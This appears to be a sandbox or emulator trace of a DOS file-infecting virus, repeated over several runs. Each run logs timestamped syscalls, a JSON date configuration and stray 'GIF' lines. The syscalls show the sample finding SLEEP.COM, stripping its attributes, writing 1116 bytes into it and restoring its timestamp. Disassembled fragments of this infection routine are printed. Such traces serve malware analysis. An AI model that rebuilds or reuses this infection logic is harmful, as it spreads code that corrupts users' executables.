2018-12-25T12:30:45.334481973Z 64 PC: 12cb8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:30:45.338113778Z 64 PC: 12cca | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:45.357950052Z 64 PC: 12cdf | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:45.360773137Z 66 PC: 12ce8 | Move file pointer
2018-12-25T12:30:45.363539754Z 64 PC: 12a99 | Write file or device (Write 1116 bytes on handle 5)
2018-12-25T12:30:45.372654006Z 87 PC: 12d01 | Get or set file date and time
2018-12-25T12:30:45.374373746Z 62 PC: 12d05 | Close file
2018-12-25T12:30:45.382642954Z 67 PC: 12d16 | Get or set file attributes
2018-12-25T12:30:45.392780337Z 79 PC: 12c25 | Find next file
2018-12-25T12:30:45.395643439Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:45.402519748Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:45.409253574Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:45.411633756Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:45.643310265Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:45.645367122Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:45.652187893Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:45.655634982Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:45.670830258Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:45.673757457Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:45.676345605Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:45.899402654Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:45.901000619Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:46.093057787Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:46.1127111Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:30:46.115716477Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:46.122638876Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:46.12999994Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:46.132215476Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:46.152149726Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:46.155420247Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:46.162756953Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:46.169787958Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:46.174488934Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:46.177340383Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:46.179429537Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:46.19766892Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:46.199429202Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:46.221737822Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:46.242635238Z 42 PC: 12b6a | Get date 0x12b6a: cmp dx, 0x709
0x12b6e: je 0x12b73
0x12b70: jmp 0x12d88
0x12b73: jmp 0x12d1c
0x12b76: and ah, bh
0x12b78: movsw word ptr es:[di], word ptr [si]
0x12b79: mov ax, 0x5c4c
0x12b7c: add word ptr [di], ax
0x12b7e: add byte ptr [di - 0x77], dl
0x12b81: in ax, -0x7d
0x12b83: in al, dx
0x12b84: sub al, 0x56
0x12b86: jmp 0x12bf8
0x12b89: mov ah, 0x1a
0x12b8b: lea dx, word ptr [bp - 0x2c]
0x12b8e: int 0x21
0x12b90: mov ah, 0x4e
0x12b92: mov cx, 0x10
0x12b95: mov dx, 0x19f
0x12b98: add dx, word ptr [0x106]
2018-12-25T12:30:46.245162285Z 59 PC: 12d93 | Change current directory
2018-12-25T12:30:46.249432306Z 59 PC: 12d9a | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":11460,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:46.936852239Z 71 PC: 12b44 | Get current directory
2018-12-25T12:30:46.940415825Z 59 PC: 12b4f | Change current directory
2018-12-25T12:30:46.944536505Z 26 PC: 12c03 | Set disk transfer address
2018-12-25T12:30:46.945838967Z 78 PC: 12c11 | Find first file
2018-12-25T12:30:46.957102117Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:46.964491528Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:30:46.971113837Z 44 PC: 12c82 | Get time 0x12c82: add dl, dh
0x12c84: je 0x12c7e
0x12c86: mov si, 0x115
0x12c89: add si, word ptr [0x106]
0x12c8d: mov byte ptr [si], dl
0x12c8f: mov ax, 0x4301
0x12c92: xor cx, cx
0x12c94: mov dx, si
0x12c96: add dx, 0xb1
0x12c9a: int 0x21
0x12c9c: mov ah, 0x3e
0x12c9e: int 0x21
0x12ca0: mov ax, 0x3d02
0x12ca3: int 0x21
0x12ca5: jb 0x12c5e
0x12ca7: mov di, dx
0x12ca9: add di, 0x5d
0x12cac: stosw word ptr es:[di], ax
0x12cad: xchg ax, bx
0x12cae: mov ah, 0x40
2018-12-25T12:30:46.97338722Z 67 PC: 12c9c | Get or set file attributes
2018-12-25T12:30:46.989355669Z 62 PC: 12ca0 | Close file
2018-12-25T12:30:46.991256873Z 61 PC: 12ca5 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:46.997885691Z 64 PC: 12cb8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:30:47.001176447Z 64 PC: 12cca | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:47.003949604Z 64 PC: 12cdf | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:47.0066838Z 66 PC: 12ce8 | Move file pointer
2018-12-25T12:30:47.009720607Z 64 PC: 12a99 | Write file or device (Write 1116 bytes on handle 5)
2018-12-25T12:30:47.018618913Z 87 PC: 12d01 | Get or set file date and time
2018-12-25T12:30:47.020161675Z 62 PC: 12d05 | Close file
2018-12-25T12:30:47.028418606Z 67 PC: 12d16 | Get or set file attributes
2018-12-25T12:30:47.038698666Z 79 PC: 12c25 | Find next file
2018-12-25T12:30:47.041407283Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:47.04908558Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:47.056115931Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:47.058259077Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:47.068239952Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:47.070472288Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:47.077272456Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:47.080452364Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:47.084025834Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:47.086768341Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:47.088801454Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:47.099400689Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:47.101103494Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:47.113188339Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:47.123692373Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:30:47.126569535Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:47.133183655Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:47.140728974Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:47.142833104Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:47.152541306Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:47.157162277Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:47.169198304Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:47.176347072Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:47.179827128Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:47.182849399Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:47.184985129Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:47.1946025Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:47.196370201Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:47.204070431Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:47.213928546Z 42 PC: 12b6a | Get date 0x12b6a: cmp dx, 0x709
0x12b6e: je 0x12b73
0x12b70: jmp 0x12d88
0x12b73: jmp 0x12d1c
0x12b76: and ah, bh
0x12b78: movsw word ptr es:[di], word ptr [si]
0x12b79: mov ax, 0x5c4c
0x12b7c: add word ptr [di], ax
0x12b7e: add byte ptr [di - 0x77], dl
0x12b81: in ax, -0x7d
0x12b83: in al, dx
0x12b84: sub al, 0x56
0x12b86: jmp 0x12bf8
0x12b89: mov ah, 0x1a
0x12b8b: lea dx, word ptr [bp - 0x2c]
0x12b8e: int 0x21
0x12b90: mov ah, 0x4e
0x12b92: mov cx, 0x10
0x12b95: mov dx, 0x19f
0x12b98: add dx, word ptr [0x106]
2018-12-25T12:30:47.217294054Z 59 PC: 12d93 | Change current directory
2018-12-25T12:30:47.22144749Z 59 PC: 12d9a | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":11460,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:47.13272124Z 71 PC: 12b44 | Get current directory
2018-12-25T12:30:47.135988482Z 59 PC: 12b4f | Change current directory
2018-12-25T12:30:47.139979774Z 26 PC: 12c03 | Set disk transfer address
2018-12-25T12:30:47.141218536Z 78 PC: 12c11 | Find first file
2018-12-25T12:30:47.156927174Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:47.16345623Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:30:47.170128663Z 44 PC: 12c82 | Get time 0x12c82: add dl, dh
0x12c84: je 0x12c7e
0x12c86: mov si, 0x115
0x12c89: add si, word ptr [0x106]
0x12c8d: mov byte ptr [si], dl
0x12c8f: mov ax, 0x4301
0x12c92: xor cx, cx
0x12c94: mov dx, si
0x12c96: add dx, 0xb1
0x12c9a: int 0x21
0x12c9c: mov ah, 0x3e
0x12c9e: int 0x21
0x12ca0: mov ax, 0x3d02
0x12ca3: int 0x21
0x12ca5: jb 0x12c5e
0x12ca7: mov di, dx
0x12ca9: add di, 0x5d
0x12cac: stosw word ptr es:[di], ax
0x12cad: xchg ax, bx
0x12cae: mov ah, 0x40
2018-12-25T12:30:47.173073611Z 67 PC: 12c9c | Get or set file attributes
2018-12-25T12:30:47.189811908Z 62 PC: 12ca0 | Close file
2018-12-25T12:30:47.192076386Z 61 PC: 12ca5 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:47.198893477Z 64 PC: 12cb8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:30:47.202528082Z 64 PC: 12cca | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:47.205258757Z 64 PC: 12cdf | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:47.207888375Z 66 PC: 12ce8 | Move file pointer
2018-12-25T12:30:47.210574891Z 64 PC: 12a99 | Write file or device (Write 1116 bytes on handle 5)
2018-12-25T12:30:47.226056211Z 87 PC: 12d01 | Get or set file date and time
2018-12-25T12:30:47.227903655Z 62 PC: 12d05 | Close file
2018-12-25T12:30:47.23675536Z 67 PC: 12d16 | Get or set file attributes
2018-12-25T12:30:47.246747011Z 79 PC: 12c25 | Find next file
2018-12-25T12:30:47.249639309Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:47.257442345Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:47.264097084Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:47.266518352Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:47.277389129Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:47.281179608Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:47.296695192Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:47.303201159Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:47.319063488Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:47.321647451Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:47.323544556Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:47.333645697Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:47.338470646Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:47.351409119Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:47.359934639Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:30:47.36283284Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:47.369549946Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:47.376700242Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:47.379128225Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:47.389701917Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:47.392318489Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:47.399004108Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:47.401966174Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:47.405402943Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:47.408186097Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:47.410237559Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:47.420840599Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:47.422680103Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:47.430387067Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:47.441082181Z 42 PC: 12b6a | Get date 0x12b6a: cmp dx, 0x709
0x12b6e: je 0x12b73
0x12b70: jmp 0x12d88
0x12b73: jmp 0x12d1c
0x12b76: and ah, bh
0x12b78: movsw word ptr es:[di], word ptr [si]
0x12b79: mov ax, 0x5c4c
0x12b7c: add word ptr [di], ax
0x12b7e: add byte ptr [di - 0x77], dl
0x12b81: in ax, -0x7d
0x12b83: in al, dx
0x12b84: sub al, 0x56
0x12b86: jmp 0x12bf8
0x12b89: mov ah, 0x1a
0x12b8b: lea dx, word ptr [bp - 0x2c]
0x12b8e: int 0x21
0x12b90: mov ah, 0x4e
0x12b92: mov cx, 0x10
0x12b95: mov dx, 0x19f
0x12b98: add dx, word ptr [0x106]
2018-12-25T12:30:47.443630748Z 59 PC: 12d93 | Change current directory
2018-12-25T12:30:47.447753319Z 59 PC: 12d9a | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":11460,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:49.035998192Z 71 PC: 12b44 | Get current directory
2018-12-25T12:30:49.039678569Z 59 PC: 12b4f | Change current directory
2018-12-25T12:30:49.043651783Z 26 PC: 12c03 | Set disk transfer address
2018-12-25T12:30:49.044716603Z 78 PC: 12c11 | Find first file
2018-12-25T12:30:49.056449191Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:49.068236158Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:30:49.07479825Z 44 PC: 12c82 | Get time 0x12c82: add dl, dh
0x12c84: je 0x12c7e
0x12c86: mov si, 0x115
0x12c89: add si, word ptr [0x106]
0x12c8d: mov byte ptr [si], dl
0x12c8f: mov ax, 0x4301
0x12c92: xor cx, cx
0x12c94: mov dx, si
0x12c96: add dx, 0xb1
0x12c9a: int 0x21
0x12c9c: mov ah, 0x3e
0x12c9e: int 0x21
0x12ca0: mov ax, 0x3d02
0x12ca3: int 0x21
0x12ca5: jb 0x12c5e
0x12ca7: mov di, dx
0x12ca9: add di, 0x5d
0x12cac: stosw word ptr es:[di], ax
0x12cad: xchg ax, bx
0x12cae: mov ah, 0x40
2018-12-25T12:30:49.077655931Z 67 PC: 12c9c | Get or set file attributes
2018-12-25T12:30:49.094020324Z 62 PC: 12ca0 | Close file
2018-12-25T12:30:49.09597229Z 61 PC: 12ca5 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:49.10281285Z 64 PC: 12cb8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:30:49.10614364Z 64 PC: 12cca | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:49.108897067Z 64 PC: 12cdf | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:49.111631787Z 66 PC: 12ce8 | Move file pointer
2018-12-25T12:30:49.114556483Z 64 PC: 12a99 | Write file or device (Write 1116 bytes on handle 5)
2018-12-25T12:30:49.123545534Z 87 PC: 12d01 | Get or set file date and time
2018-12-25T12:30:49.124981889Z 62 PC: 12d05 | Close file
2018-12-25T12:30:49.133970521Z 67 PC: 12d16 | Get or set file attributes
2018-12-25T12:30:49.144224216Z 79 PC: 12c25 | Find next file
2018-12-25T12:30:49.147288337Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:49.154687163Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:49.161008386Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:49.163073672Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:49.175204528Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:49.176876807Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:49.183491751Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:49.19194297Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:49.194854342Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:49.197719642Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:49.209094066Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:49.21867803Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:49.220191808Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:49.228524346Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:49.238444166Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:30:49.241397699Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:49.248249455Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:49.255302035Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:49.257289475Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:49.267002791Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:49.268898267Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:49.280545858Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:49.287018773Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:49.289409062Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:49.291210069Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:49.29250809Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:49.298532213Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:49.299638326Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:49.304915605Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:49.315700074Z 42 PC: 12b6a | Get date 0x12b6a: cmp dx, 0x709
0x12b6e: je 0x12b73
0x12b70: jmp 0x12d88
0x12b73: jmp 0x12d1c
0x12b76: and ah, bh
0x12b78: movsw word ptr es:[di], word ptr [si]
0x12b79: mov ax, 0x5c4c
0x12b7c: add word ptr [di], ax
0x12b7e: add byte ptr [di - 0x77], dl
0x12b81: in ax, -0x7d
0x12b83: in al, dx
0x12b84: sub al, 0x56
0x12b86: jmp 0x12bf8
0x12b89: mov ah, 0x1a
0x12b8b: lea dx, word ptr [bp - 0x2c]
0x12b8e: int 0x21
0x12b90: mov ah, 0x4e
0x12b92: mov cx, 0x10
0x12b95: mov dx, 0x19f
0x12b98: add dx, word ptr [0x106]
2018-12-25T12:30:49.318006727Z 59 PC: 12d93 | Change current directory
2018-12-25T12:30:49.322177446Z 59 PC: 12d9a | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":11460,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:49.32546011Z 71 PC: 12b44 | Get current directory
2018-12-25T12:30:49.329451216Z 59 PC: 12b4f | Change current directory
2018-12-25T12:30:49.334255392Z 26 PC: 12c03 | Set disk transfer address
2018-12-25T12:30:49.335826367Z 78 PC: 12c11 | Find first file
2018-12-25T12:30:49.349091108Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:49.35762565Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:30:49.36530763Z 44 PC: 12c82 | Get time 0x12c82: add dl, dh
0x12c84: je 0x12c7e
0x12c86: mov si, 0x115
0x12c89: add si, word ptr [0x106]
0x12c8d: mov byte ptr [si], dl
0x12c8f: mov ax, 0x4301
0x12c92: xor cx, cx
0x12c94: mov dx, si
0x12c96: add dx, 0xb1
0x12c9a: int 0x21
0x12c9c: mov ah, 0x3e
0x12c9e: int 0x21
0x12ca0: mov ax, 0x3d02
0x12ca3: int 0x21
0x12ca5: jb 0x12c5e
0x12ca7: mov di, dx
0x12ca9: add di, 0x5d
0x12cac: stosw word ptr es:[di], ax
0x12cad: xchg ax, bx
0x12cae: mov ah, 0x40
2018-12-25T12:30:49.369093239Z 67 PC: 12c9c | Get or set file attributes
2018-12-25T12:30:49.388064506Z 62 PC: 12ca0 | Close file
2018-12-25T12:30:49.390170878Z 61 PC: 12ca5 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:49.397970676Z 64 PC: 12cb8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:30:49.402114675Z 64 PC: 12cca | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:49.405612184Z 64 PC: 12cdf | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:49.40892802Z 66 PC: 12ce8 | Move file pointer
2018-12-25T12:30:49.412552539Z 64 PC: 12a99 | Write file or device (Write 1116 bytes on handle 5)
2018-12-25T12:30:49.423206926Z 87 PC: 12d01 | Get or set file date and time
2018-12-25T12:30:49.425028186Z 62 PC: 12d05 | Close file
2018-12-25T12:30:49.435374567Z 67 PC: 12d16 | Get or set file attributes
2018-12-25T12:30:49.446799272Z 79 PC: 12c25 | Find next file
2018-12-25T12:30:49.449984918Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:49.459048225Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:49.463552591Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:49.465301186Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:49.473927148Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:49.475837641Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:49.484168301Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:49.487238947Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:49.490317611Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:49.493918192Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:49.496437421Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:49.507760976Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:49.510137066Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:49.51919929Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:49.531677672Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:30:49.534953923Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:49.54265911Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:49.551097263Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:49.553491673Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:49.565347912Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:49.56849261Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:49.576153086Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:49.579397246Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:49.584832994Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:49.588394075Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:49.591102427Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:49.601850341Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:49.604320892Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:49.613063854Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:49.624485321Z 42 PC: 12b6a | Get date 0x12b6a: cmp dx, 0x709
0x12b6e: je 0x12b73
0x12b70: jmp 0x12d88
0x12b73: jmp 0x12d1c
0x12b76: and ah, bh
0x12b78: movsw word ptr es:[di], word ptr [si]
0x12b79: mov ax, 0x5c4c
0x12b7c: add word ptr [di], ax
0x12b7e: add byte ptr [di - 0x77], dl
0x12b81: in ax, -0x7d
0x12b83: in al, dx
0x12b84: sub al, 0x56
0x12b86: jmp 0x12bf8
0x12b89: mov ah, 0x1a
0x12b8b: lea dx, word ptr [bp - 0x2c]
0x12b8e: int 0x21
0x12b90: mov ah, 0x4e
0x12b92: mov cx, 0x10
0x12b95: mov dx, 0x19f
0x12b98: add dx, word ptr [0x106]
2018-12-25T12:30:49.628352936Z 59 PC: 12d93 | Change current directory
2018-12-25T12:30:49.63290405Z 59 PC: 12d9a | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":11460,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:49.534976913Z 71 PC: 12b44 | Get current directory
2018-12-25T12:30:49.538386345Z 59 PC: 12b4f | Change current directory
2018-12-25T12:30:49.543185522Z 26 PC: 12c03 | Set disk transfer address
2018-12-25T12:30:49.544236369Z 78 PC: 12c11 | Find first file
2018-12-25T12:30:49.550504915Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:49.557948654Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:30:49.564756537Z 44 PC: 12c82 | Get time 0x12c82: add dl, dh
0x12c84: je 0x12c7e
0x12c86: mov si, 0x115
0x12c89: add si, word ptr [0x106]
0x12c8d: mov byte ptr [si], dl
0x12c8f: mov ax, 0x4301
0x12c92: xor cx, cx
0x12c94: mov dx, si
0x12c96: add dx, 0xb1
0x12c9a: int 0x21
0x12c9c: mov ah, 0x3e
0x12c9e: int 0x21
0x12ca0: mov ax, 0x3d02
0x12ca3: int 0x21
0x12ca5: jb 0x12c5e
0x12ca7: mov di, dx
0x12ca9: add di, 0x5d
0x12cac: stosw word ptr es:[di], ax
0x12cad: xchg ax, bx
0x12cae: mov ah, 0x40
2018-12-25T12:30:49.567053139Z 67 PC: 12c9c | Get or set file attributes
2018-12-25T12:30:49.587798924Z 62 PC: 12ca0 | Close file
2018-12-25T12:30:49.590176665Z 61 PC: 12ca5 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:49.597789509Z 64 PC: 12cb8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:30:49.605315811Z 64 PC: 12cca | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:49.608725957Z 64 PC: 12cdf | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:49.612725887Z 66 PC: 12ce8 | Move file pointer
2018-12-25T12:30:49.614378006Z 64 PC: 12a99 | Write file or device (Write 1116 bytes on handle 5)
2018-12-25T12:30:49.622401194Z 87 PC: 12d01 | Get or set file date and time
2018-12-25T12:30:49.624118917Z 62 PC: 12d05 | Close file
2018-12-25T12:30:49.632842005Z 67 PC: 12d16 | Get or set file attributes
2018-12-25T12:30:49.644082488Z 79 PC: 12c25 | Find next file
2018-12-25T12:30:49.64720855Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:49.656175437Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:49.664697951Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:49.667070395Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:49.678851829Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:49.681478819Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:49.688938592Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:49.691964543Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:49.695353637Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:49.698290926Z 66 PC: 12ce8 | Move file pointer (See above)
